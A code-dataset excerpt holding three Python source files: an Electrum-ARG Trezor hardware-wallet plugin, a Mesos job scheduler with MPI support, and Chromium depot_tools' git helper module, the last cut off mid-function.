source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
plugin.py
|
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum_arg.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum_arg.i18n import _
from electrum_arg.plugins import BasePlugin, hook
from electrum_arg.transaction import deserialize, Transaction
from electrum_arg.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Electrum and %s encryption and decryption are currently incompatible') % self.device)
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
payload = base64.b64decode(message)
nonce, message, msg_hmac = payload[:33], payload[33:-8], payload[-8:]
result = client.decrypt_message(address_n, nonce, message, msg_hmac)
return result.message
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in txin['x_pubkeys']:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
assert self.main_thread != threading.current_thread()
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
if TESTNET:
return "Testnet"
else:
return "Argentum"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = signed_tx.encode('hex')
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
client.get_address(self.get_coin_name(), address_n, True)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: x.decode('hex') if x else '', txin.get('signatures')),
m=txin.get('num_sig'),
)
txinputtype = self.types.TxInputType(
script_type=self.types.SPENDMULTISIG,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = txin['scriptSig'].decode('hex')
txinputtype.script_sig = script_sig
if 'sequence' in txin:
sequence = txin['sequence']
txinputtype.sequence = sequence
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = bc_address_to_hash_160(address)
index, xpubs, m = info
if addrtype == ADDRTYPE_P2PKH:
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = self.types.PAYTOADDRESS,
address_n = address_n,
)
elif addrtype == ADDRTYPE_P2SH:
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
script_type = self.types.PAYTOMULTISIG)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = bc_address_to_hash_160(address)
if addrtype == ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype')
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = vout['scriptPubKey'].decode('hex')
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
scheduler.py
|
#!/usr/bin/env python
import os
import cPickle as pickle
import sys
import time
import socket
import random
from optparse import OptionParser
from threading import Thread
import subprocess
from operator import itemgetter
import logging
import signal
import zmq
import mesos
import mesos_pb2
ctx = zmq.Context()
class Task:
def __init__(self, id):
self.id = id
self.tried = 0
REFUSE_FILTER = mesos_pb2.Filters()
REFUSE_FILTER.refuse_seconds = -1
def parse_mem(m):
try:
return float(m)
except ValueError:
number, unit = float(m[:-1]), m[-1].lower()
if unit == 'g':
number *= 1024
elif unit == 'k':
number /= 1024
return number
class SubmitScheduler(mesos.Scheduler):
def __init__(self, options, command):
self.framework_name = '[drun@%s] ' % socket.gethostname() + ' '.join(sys.argv[1:])
self.cpus = options.cpus
self.mem = parse_mem(options.mem)
self.options = options
self.command = command
self.total_tasks = list(reversed([Task(i)
for i in range(options.start, options.tasks)]))
self.task_launched = {}
self.slaveTasks = {}
self.started = False
self.stopped = False
self.next_try = 0
def getExecutorInfo(self):
frameworkDir = os.path.abspath(os.path.dirname(sys.argv[0]))
executorPath = os.path.join(frameworkDir, "executor")
execInfo = mesos_pb2.ExecutorInfo()
execInfo.executor_id.value = "default"
execInfo.uri = executorPath
return execInfo
def create_port(self, output):
sock = ctx.socket(zmq.PULL)
host = socket.gethostname()
port = sock.bind_to_random_port("tcp://0.0.0.0")
def redirect():
while True:
line = sock.recv()
output.write(line)
t = Thread(target=redirect)
t.daemon = True
t.start()
return "tcp://%s:%d" % (host, port)
def registered(self, driver, fid):
logging.debug("Registered with Mesos, FID = %s" % fid.value)
self.fid = fid.value
self.std_port = self.create_port(sys.stdout)
self.err_port = self.create_port(sys.stderr)
def getResource(self, offer):
cpus, mem = 0, 0
for r in offer.resources:
if r.name == 'cpus':
cpus = float(r.scalar.value)
elif r.name == 'mem':
mem = float(r.scalar.value)
return cpus, mem
def getAttributes(self, offer):
attrs = {}
for a in offer.attributes:
attrs[a.name] = a.text.value
return attrs
def resourceOffers(self, driver, offers):
tpn = self.options.task_per_node or sys.maxint
random.shuffle(offers)
for offer in offers:
cpus, mem = self.getResource(offer)
logging.debug("got resource offer %s: cpus:%s, mem:%s at %s",
offer.id.value, cpus, mem, offer.hostname)
attrs = self.getAttributes(offer)
if self.options.group and attrs.get('group', 'None') not in self.options.group:
driver.launchTasks(offer.id, [], REFUSE_FILTER)
continue
sid = offer.slave_id.value
tasks = []
while (self.total_tasks and cpus >= self.cpus and mem >= self.mem
and len(self.slaveTasks.get(sid, set())) < tpn):
logging.debug("Accepting slot on slave %s (%s)",
offer.slave_id.value, offer.hostname)
t = self.total_tasks.pop()
task = self.create_task(offer, t)
tasks.append(task)
t.offer_id = offer.id.value
self.task_launched[t.id] = t
self.slaveTasks.setdefault(sid, set()).add(t.id)
cpus -= self.cpus
mem -= self.mem
driver.launchTasks(offer.id, tasks, REFUSE_FILTER)
self.started = True
def create_task(self, offer, t):
task = mesos_pb2.TaskDescription()
task.task_id.value = str(t.id)
task.slave_id.value = offer.slave_id.value
task.name = "task %s/%d" % (t.id, self.options.tasks)
env = dict(os.environ)
env['DRUN_RANK'] = str(t.id)
env['DRUN_SIZE'] = str(self.options.tasks)
if self.options.expand:
for i, x in enumerate(self.command):
self.command[i] = x % {'RANK': t.id, 'SIZE': self.options.tasks}
task.data = pickle.dumps([os.getcwd(), self.command, env, self.options.shell, self.std_port, self.err_port])
cpu = task.resources.add()
cpu.name = "cpus"
cpu.type = 0 # mesos_pb2.Value.SCALAR
cpu.scalar.value = self.cpus
mem = task.resources.add()
mem.name = "mem"
mem.type = 0 # mesos_pb2.Value.SCALAR
mem.scalar.value = self.mem
return task
def statusUpdate(self, driver, update):
logging.debug("Task %s in state %d" % (update.task_id.value, update.state))
if update.state >= mesos_pb2.TASK_FINISHED:
tid = int(update.task_id.value)
if tid not in self.task_launched:
return
t = self.task_launched.pop(tid)
slave = None
for s in self.slaveTasks:
if tid in self.slaveTasks[s]:
slave = s
self.slaveTasks[s].remove(tid)
break
if update.state >= mesos_pb2.TASK_FAILED:
if t.tried < self.options.retry:
t.tried += 1
logging.warning("task %d failed with %d, retry %d", t.id, update.state, t.tried)
if not self.total_tasks:
driver.reviveOffers() # request more offers again
self.total_tasks.append(t) # try again
else:
logging.error("task %d failed with %d on %s", t.id, update.state, slave)
if not self.task_launched and not self.total_tasks:
self.stop(driver) # all done
def offerRescinded(self, driver, offer_id):
logging.error("resource rescinded: %s", offer_id)
for t in self.task_launched.values():
if offer_id.value == t.offer_id:
self.total_tasks.append(t)
del self.task_launched[t.id]
driver.reviveOffers()
def slaveLost(self, driver, slave_id):
logging.warning("slave %s lost", slave_id.value)
#for tid in self.slaveTasks[slave_id.value]:
# self.total_tasks.append(self.task_launched[tid])
# del self.task_launched[tid]
#driver.reviveOffers()
def error(self, driver, code, message):
logging.error("Error from Mesos: %s (error code: %d)" % (message, code))
def stop(self, driver):
driver.stop(False)
driver.join()
self.stopped = True
logging.debug("scheduler stopped")
class MPIScheduler(SubmitScheduler):
def resourceOffers(self, driver, offers):
if not self.total_tasks:
for o in offers:
driver.launchTasks(o.id, [], REFUSE_FILTER)
return
random.shuffle(offers)
used_offers = []
need = self.options.tasks
for offer in offers:
cpus, mem = self.getResource(offer)
attrs = self.getAttributes(offer)
logging.debug("got resource offer %s: cpus:%s, mem:%s at %s",
offer.id.value, cpus, mem, offer.hostname)
if self.options.group and attrs.get('group', 'None') not in self.options.group:
continue
slots = min(cpus/self.cpus, mem/self.mem)
if self.options.task_per_node:
slots = min(slots, self.options.task_per_node)
if slots >= 1 :
used_offers.append((offer, slots))
if sum(s for o,s in used_offers) < need:
logging.warning('not enough offers: need %d offer %d', need, sum(s for o,s in used_offers))
for o in offers:
driver.launchTasks(o.id, [])
self.next_try = time.time() + 60
return
hosts = []
c = 0
for offer, slots in sorted(used_offers, key=itemgetter(1), reverse=True):
k = min(need - c, slots)
hosts.append((offer, k))
c += k
if c >= need:
break
try:
slaves = self.start_mpi(command, self.options.tasks, hosts)
except Exception:
for o in offers:
driver.launchTasks(o.id, [])
self.next_try = time.time() + 10
return
tasks = {}
for i, ((offer, k), slave) in enumerate(zip(hosts,slaves)):
t = Task(i)
self.task_launched[t.id] = t
tasks[offer.id.value] = [self.create_task(offer, t, slave.split(' '), k)]
for o in offers:
driver.launchTasks(o.id, tasks.get(o.id.value, []), REFUSE_FILTER)
self.total_tasks = []
self.started = True
def create_task(self, offer, t, command, k):
task = mesos_pb2.TaskDescription()
task.task_id.value = str(t.id)
task.slave_id.value = offer.slave_id.value
task.name = "task %s" % t.id
env = dict(os.environ)
task.data = pickle.dumps([os.getcwd(), command, env, self.options.shell, self.std_port, self.err_port])
cpu = task.resources.add()
cpu.name = "cpus"
cpu.type = 0 #mesos_pb2.Value.SCALAR
cpu.scalar.value = self.cpus * k
mem = task.resources.add()
mem.name = "mem"
mem.type = 0 #mesos_pb2.Value.SCALAR
mem.scalar.value = self.mem * k
return task
def start_mpi(self, command, tasks, offers):
hosts = ','.join("%s:%d" % (offer.hostname, slots) for offer, slots in offers)
logging.debug("choosed hosts: %s", hosts)
cmd = ['mpirun', '-prepend-rank', '-launcher', 'none', '-hosts', hosts, '-np', str(tasks)] + command
self.p = p = subprocess.Popen(cmd, bufsize=0, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
slaves = []
prefix = 'HYDRA_LAUNCH: '
while True:
line = p.stdout.readline()
if not line: break
if line.startswith(prefix):
slaves.append(line[len(prefix):-1].strip())
if line == 'HYDRA_LAUNCH_END\n':
break
if len(slaves) != len(offers):
logging.error("offers: %s, slaves: %s", offers, slaves)
raise Exception("slaves not match with offers")
def output(f):
while True:
line = f.readline()
if not line: break
sys.stdout.write(line)
self.tout = t = Thread(target=output, args=[p.stdout])
t.deamon = True
t.start()
self.terr = t = Thread(target=output, args=[p.stderr])
t.deamon = True
t.start()
return slaves
def stop(self, driver):
if self.started:
self.p.wait()
driver.stop(False)
driver.join()
self.stopped = True
logging.debug("scheduler stopped")
if __name__ == "__main__":
parser = OptionParser(usage="Usage: %prog [options] <command>")
parser.allow_interspersed_args=False
parser.add_option("-s", "--master", type="string",
default="zoo://zk1:2181,zk2:2181,zk3:2181,zk4:2181,zk5:2181/mesos_master",
help="url of master (default: zookeeper")
parser.add_option("-i", "--mpi", action="store_true",
help="run MPI tasks")
parser.add_option("-n", "--tasks", type="int", default=1,
help="number task to launch (default: 1)")
parser.add_option("-b", "--start", type="int", default=0,
help="which task to start (default: 0)")
parser.add_option("-p", "--task_per_node", type="int", default=0,
help="max number of tasks on one node (default: 0)")
parser.add_option("-r","--retry", type="int", default=0,
help="retry times when failed (default: 0)")
parser.add_option("-c","--cpus", type="float", default=1,
help="number of CPUs per task (default: 1)")
parser.add_option("-m","--mem", type="string", default='100m',
help="MB of memory per task (default: 100m)")
parser.add_option("-g","--group", type="string", default='',
help="which group to run (default: ''")
parser.add_option("--expand", action="store_true",
help="expand expression in command line")
parser.add_option("--shell", action="store_true",
help="using shell re-intepret the cmd args")
# parser.add_option("--kill", type="string", default="",
# help="kill a job with frameword id")
parser.add_option("-q", "--quiet", action="store_true",
help="be quiet", )
parser.add_option("-v", "--verbose", action="store_true",
help="show more useful log", )
(options, command) = parser.parse_args()
# if options.kill:
# sched = MPIScheduler(options, command)
# fid = mesos_pb2.FrameworkID()
# fid.value = options.kill
# driver = mesos.MesosSchedulerDriver(sched, sched.framework_name,
# sched.getExecutorInfo(), options.master, fid)
# driver.start()
# driver.stop(False)
# os._exit(0)
if not command:
parser.print_help()
exit(2)
logging.basicConfig(format='[drun] %(asctime)-15s %(message)s',
level=options.quiet and logging.WARNING
or options.verbose and logging.DEBUG
or logging.INFO)
if options.mpi:
if options.retry > 0:
logging.error("MPI application can not retry")
options.retry = 0
sched = MPIScheduler(options, command)
else:
sched = SubmitScheduler(options, command)
logging.debug("Connecting to mesos master %s", options.master)
driver = mesos.MesosSchedulerDriver(sched, sched.framework_name,
sched.getExecutorInfo(), options.master)
driver.start()
def handler(signm, frame):
logging.warning("got signal %d, exit now", signm)
sched.stop(driver)
sys.exit(1)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGHUP, handler)
signal.signal(signal.SIGABRT, handler)
signal.signal(signal.SIGQUIT, handler)
while not sched.stopped:
time.sleep(1)
if not sched.started and sched.next_try > 0 and time.time() > sched.next_try:
driver.reviveOffers()
|
git_common.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Monkeypatch IMapIterator so that Ctrl-C can kill everything properly.
# Derived from https://gist.github.com/aljungberg/626518
import multiprocessing.pool
from multiprocessing.pool import IMapIterator
def wrapper(func):
def wrap(self, timeout=None):
return func(self, timeout=timeout or 1e100)
return wrap
IMapIterator.next = wrapper(IMapIterator.next)
IMapIterator.__next__ = IMapIterator.next
# TODO(iannucci): Monkeypatch all other 'wait' methods too.
import binascii
import collections
import contextlib
import functools
import logging
import os
import re
import setup_color
import shutil
import signal
import sys
import tempfile
import textwrap
import threading
import subprocess2
from StringIO import StringIO
ROOT = os.path.abspath(os.path.dirname(__file__))
IS_WIN = sys.platform == 'win32'
GIT_EXE = ROOT+'\\git.bat' if IS_WIN else 'git'
TEST_MODE = False
FREEZE = 'FREEZE'
FREEZE_SECTIONS = {
'indexed': 'soft',
'unindexed': 'mixed'
}
FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, '|'.join(FREEZE_SECTIONS)))
# Retry a git operation if git returns a error response with any of these
# messages. It's all observed 'bad' GoB responses so far.
#
# This list is inspired/derived from the one in ChromiumOS's Chromite:
# <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS
#
# It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'.
GIT_TRANSIENT_ERRORS = (
# crbug.com/285832
r'!.*\[remote rejected\].*\(error in hook\)',
# crbug.com/289932
r'!.*\[remote rejected\].*\(failed to lock\)',
# crbug.com/307156
r'!.*\[remote rejected\].*\(error in Gerrit backend\)',
# crbug.com/285832
r'remote error: Internal Server Error',
# crbug.com/294449
r'fatal: Couldn\'t find remote ref ',
# crbug.com/220543
r'git fetch_pack: expected ACK/NAK, got',
# crbug.com/189455
r'protocol error: bad pack header',
# crbug.com/202807
r'The remote end hung up unexpectedly',
# crbug.com/298189
r'TLS packet with unexpected length was received',
# crbug.com/187444
r'RPC failed; result=\d+, HTTP code = \d+',
# crbug.com/388876
r'Connection timed out',
# crbug.com/430343
# TODO(dnj): Resync with Chromite.
r'The requested URL returned error: 5\d+',
)
GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS),
re.IGNORECASE)
# git's for-each-ref command first supported the upstream:track token in its
# format string in version 1.9.0, but some usages were broken until 2.3.0.
# See git commit b6160d95 for more information.
MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3)
class BadCommitRefException(Exception):
def __init__(self, refs):
msg = ('one of %s does not seem to be a valid commitref.' %
str(refs))
super(BadCommitRefException, self).__init__(msg)
def memoize_one(**kwargs):
"""Memoizes a single-argument pure function.
Values of None are not cached.
Kwargs:
threadsafe (bool) - REQUIRED. Specifies whether to use locking around
cache manipulation functions. This is a kwarg so that users of memoize_one
are forced to explicitly and verbosely pick True or False.
Adds three methods to the decorated function:
* get(key, default=None) - Gets the value for this key from the cache.
* set(key, value) - Sets the value for this key from the cache.
* clear() - Drops the entire contents of the cache. Useful for unittests.
* update(other) - Updates the contents of the cache from another dict.
"""
assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}'
threadsafe = kwargs['threadsafe']
if threadsafe:
def withlock(lock, f):
def inner(*args, **kwargs):
with lock:
return f(*args, **kwargs)
return inner
else:
def withlock(_lock, f):
return f
def decorator(f):
# Instantiate the lock in decorator, in case users of memoize_one do:
#
# memoizer = memoize_one(threadsafe=True)
#
# @memoizer
# def fn1(val): ...
#
# @memoizer
# def fn2(val): ...
lock = threading.Lock() if threadsafe else None
cache = {}
_get = withlock(lock, cache.get)
_set = withlock(lock, cache.__setitem__)
@functools.wraps(f)
def inner(arg):
ret = _get(arg)
if ret is None:
ret = f(arg)
if ret is not None:
_set(arg, ret)
return ret
inner.get = _get
inner.set = _set
inner.clear = withlock(lock, cache.clear)
inner.update = withlock(lock, cache.update)
return inner
return decorator
def _ScopedPool_initer(orig, orig_args): # pragma: no cover
"""Initializer method for ScopedPool's subprocesses.
This helps ScopedPool handle Ctrl-C's correctly.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
if orig:
orig(*orig_args)
@contextlib.contextmanager
def ScopedPool(*args, **kwargs):
"""Context Manager which returns a multiprocessing.pool instance which
correctly deals with thrown exceptions.
*args - Arguments to multiprocessing.pool
Kwargs:
kind ('threads', 'procs') - The type of underlying coprocess to use.
**etc - Arguments to multiprocessing.pool
"""
if kwargs.pop('kind', None) == 'threads':
pool = multiprocessing.pool.ThreadPool(*args, **kwargs)
else:
orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ())
kwargs['initializer'] = _ScopedPool_initer
kwargs['initargs'] = orig, orig_args
pool = multiprocessing.pool.Pool(*args, **kwargs)
try:
yield pool
pool.close()
except:
pool.terminate()
raise
finally:
pool.join()
class ProgressPrinter(object):
"""Threaded single-stat status message printer."""
def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5):
"""Create a ProgressPrinter.
Use it as a context manager which produces a simple 'increment' method:
with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc:
for i in xrange(1000):
# do stuff
if i % 10 == 0:
inc(10)
Args:
fmt - String format with a single '%(count)d' where the counter value
should go.
enabled (bool) - If this is None, will default to True if
logging.getLogger() is set to INFO or more verbose.
fout (file-like) - The stream to print status messages to.
period (float) - The time in seconds for the printer thread to wait
between printing.
"""
self.fmt = fmt
if enabled is None: # pragma: no cover
self.enabled = logging.getLogger().isEnabledFor(logging.INFO)
else:
self.enabled = enabled
self._count = 0
self._dead = False
self._dead_cond = threading.Condition()
self._stream = fout
self._thread = threading.Thread(target=self._run)
self._period = period
def _emit(self, s):
if self.enabled:
self._stream.write('\r' + s)
self._stream.flush()
def _run(self):
with self._dead_cond:
while not self._dead:
self._emit(self.fmt % {'count': self._count})
self._dead_cond.wait(self._period)
self._emit((self.fmt + '\n') % {'count': self._count})
def inc(self, amount=1):
self._count += amount
def __enter__(self):
self._thread.start()
return self.inc
def __exit__(self, _exc_type, _exc_value, _traceback):
self._dead = True
with self._dead_cond:
self._dead_cond.notifyAll()
self._thread.join()
del self._thread
def once(function):
"""@Decorates |function| so that it only performs its action once, no matter
how many times the decorated |function| is called."""
def _inner_gen():
yield function()
while True:
yield
return _inner_gen().next
## Git functions
def die(message, *args):
print >> sys.stderr, textwrap.dedent(message % args)
sys.exit(1)
def blame(filename, revision=None, porcelain=False, *_args):
command = ['blame']
if porcelain:
command.append('-p')
if revision is not None:
command.append(revision)
command.extend(['--', filename])
return run(*command)
def branch_config(branch, option, default=None):
return get_config('branch.%s.%s' % (branch, option), default=default)
def branch_config_map(option):
"""Return {branch: <|option| value>} for all branches."""
try:
reg = re.compile(r'^branch\.(.*)\.%s$' % option)
lines = get_config_regexp(reg.pattern)
return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)}
except subprocess2.CalledProcessError:
return {}
def branches(*args):
NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached')
key = 'depot-tools.branch-limit'
limit = get_config_int(key, 20)
raw_branches = run('branch', *args).splitlines()
num = len(raw_branches)
if num > limit:
die("""\
Your git repo has too many branches (%d/%d) for this tool to work well.
You may adjust this limit by running:
git config %s <new_limit>
You may also try cleaning up your old branches by running:
git cl archive
""", num, limit, key)
for line in raw_branches:
if line.startswith(NO_BRANCH):
continue
yield line.split()[-1]
def get_config(option, default=None):
try:
return run('config', '--get', option) or default
except subprocess2.CalledProcessError:
return default
def get_config_int(option, default=0):
assert isinstance(default, int)
try:
return int(get_config(option, default))
except ValueError:
return default
def get_config_list(option):
try:
return run('config', '--get-all', option).split()
except subprocess2.CalledProcessError:
return []
def get_config_regexp(pattern):
if IS_WIN: # pragma: no cover
# this madness is because we call git.bat which calls git.exe which calls
# bash.exe (or something to that effect). Each layer divides the number of
# ^'s by 2.
pattern = pattern.replace('^', '^' * 8)
return run('config', '--get-regexp', pattern).splitlines()
def current_branch():
try:
return run('rev-parse', '--abbrev-ref', 'HEAD')
except subprocess2.CalledProcessError:
return None
def del_branch_config(branch, option, scope='local'):
del_config('branch.%s.%s' % (branch, option), scope=scope)
def del_config(option, scope='local'):
try:
run('config', '--' + scope, '--unset', option)
except subprocess2.CalledProcessError:
pass
def diff(oldrev, newrev, *args):
return run('diff', oldrev, newrev, *args)
def freeze():
took_action = False
key = 'depot-tools.freeze-size-limit'
MB = 2**20
limit_mb = get_config_int(key, 100)
untracked_bytes = 0
for f, s in status():
if is_unmerged(s):
die("Cannot freeze unmerged changes!")
if limit_mb > 0:
if s.lstat == '?':
